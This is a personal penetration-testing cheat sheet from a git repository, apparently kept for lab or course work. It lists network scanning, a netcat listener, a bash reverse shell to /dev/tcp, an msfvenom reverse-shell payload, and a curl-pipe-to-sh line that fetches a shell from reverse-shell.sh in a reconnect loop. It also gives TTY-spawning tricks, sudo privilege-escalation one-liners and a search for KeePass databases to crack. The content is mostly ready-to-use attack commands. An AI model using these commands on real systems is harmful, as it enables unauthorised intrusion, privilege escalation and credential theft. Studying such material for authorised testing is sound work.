Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
pentesting/Cheatsheet.md
Rh17S15 ad56aad266 links
2025-07-28 09:30:28 +02:00

343 lines
6.3 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Table of Contents
1. [information gathering](#org852ec36)
1. [nmap](#orgda1065c)
2. [dirb](#orgafbfb19)
2. [inital access](#orgd5250d9)
1. [start listener:](#orgefad80b)
2. [reverse shell bash:](#org147daab)
3. [reverse shell file:](#org32886e3)
4. [untested:](#org6c097fc)
3. [privilege escalation](#org6812526)
1. [always run these:](#org0b25bb0)
2. [TTY Spawn Shell](#org4152682)
1. [Python spawn shell](#orgf659bfd)
2. [OS system spawn shell](#org76c29ea)
3. [Bash spawn shell](#org80d5744)
4. [Perl spawn shell](#orgd4f31f3)
5. [Ruby spawn shell](#org2fe4e07)
6. [Lua spawn shell](#orgce64187)
7. [IRB spawn shell](#org28402e0)
8. [VI spawn shell](#org6bfa44c)
9. [VI(2) spawn shell](#org4241f95)
10. [Nmap spawn shell](#org5dc86b6)
4. [Windows](#orgdcc9f31)
1. [WinPEAS](#org21afc9d)
2. [LOLBAS](#org08b790e)
3. [WADCOMS](#orgb12dcff)
4. [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
5. [RUN these while the other scripts are working](#orgea4f773)
6. [for finding kbdx Files](#org0f35200)
1. to install:
- magic wormhole
- tldr
- rlwrap
-
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
2. for keyring
-> if there is some kind of keyring error
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
<a id="org852ec36"></a>
# information gathering
<a id="orgda1065c"></a>
### nmap
for quick scan of available ips
nmap -sn ip/24
to filter output for open ips
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports:
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
<a id="orgafbfb19"></a>
### dirb
dirb http://ip
1. bei windows
nmap --vuln ip
1. bei windows \\+ smb
nmap --script smb-vuln* ip
<a id="orgd5250d9"></a>
# inital access
<a id="orgefad80b"></a>
### start listener:
rlwrap -cAr nc -nlvp 9002
<a id="org147daab"></a>
### reverse shell bash:
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
<a id="org32886e3"></a>
### reverse shell file:
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-> from revshells.com
<a id="org6c097fc"></a>
### untested:
Reverse Shell as a Service
1. On your machine:
nc -l 1337
or nlvp?
1. On the target machine:
curl https://reverse-shell.sh/yourip:1337 | sh
1. reconnecting:
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
<a id="org6812526"></a>
# privilege escalation
<a id="org0b25bb0"></a>
## always run these:
sudo -l
if sudo doesn&rsquo;t work:
[3.2](#org4152682)
1. check cronjobs
ls /etc/cron.*
crontab -l
<a id="org4152682"></a>
## TTY Spawn Shell
1. if sudo still doesn&rsquo;t work
use
sudo -S command
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
<a id="orgf659bfd"></a>
### Python spawn shell
python -c 'import pty; pty.spawn("/bin/bash")'
Fully Interactive TTY
1. All the steps to stabilize your shell
****The first step:****
python3 -c 'import pty;pty.spawn("/bin/bash")'
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
****Step two is:****
export TERM=xterm
This will give us access to term commands such as clear.
****Finally (and most importantly) we will background the shell using****
Ctrl + Z
Back in our own terminal we use
stty raw -echo; fg
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
stty rows 38 columns 116
<a id="org76c29ea"></a>
### OS system spawn shell
echo os.system("/bin/bash")
<a id="org80d5744"></a>
### Bash spawn shell
/bin/sh -i
<a id="orgd4f31f3"></a>
### Perl spawn shell
perl —e 'exec "/bin/sh";'
<a id="org2fe4e07"></a>
### Ruby spawn shell
ruby: exec &ldquo;/bin/sh&rdquo;
<a id="orgce64187"></a>
### Lua spawn shell
lua: os.execute(&ldquo;/bin/sh&rdquo;)
<a id="org28402e0"></a>
### IRB spawn shell
exec &ldquo;/bin/sh&rdquo;
<a id="org6bfa44c"></a>
### VI spawn shell
:!bash
<a id="org4241f95"></a>
### VI(2) spawn shell
:set shell=/bin/bash:shell
<a id="org5dc86b6"></a>
### Nmap spawn shell
!sh
1. Exiftools
Metadaten auslesen:
exiftool picture.png
Binwalk (Binary Daten exportieren):
binwalk -e picture.png
<a id="orgdcc9f31"></a>
# Windows
<a id="org21afc9d"></a>
### WinPEAS
<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>
<a id="org08b790e"></a>
### LOLBAS
<https://lolbas-project.github.io/>#
<a id="orgb12dcff"></a>
### WADCOMS
<https://wadcoms.github.io/>
<a id="org2bed5cd"></a>
### PrivescCheck Script as an alternative to WinPEAS
<https://github.com/itm4n/PrivescCheck>
<a id="orgea4f773"></a>
### RUN these while the other scripts are working
whoami /priv
whoami /all
schtasks /query
<a id="org0f35200"></a>
### for finding kbdx Files
<https://github.com/ivanmrsulja/keepass2john>
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;
evilwinrm
quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;
https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
https://github.com/Obedaya/scripts
https://mygit.th-deg.de/lg06087/pentesting
Reference in New Issue View Git Blame Copy Permalink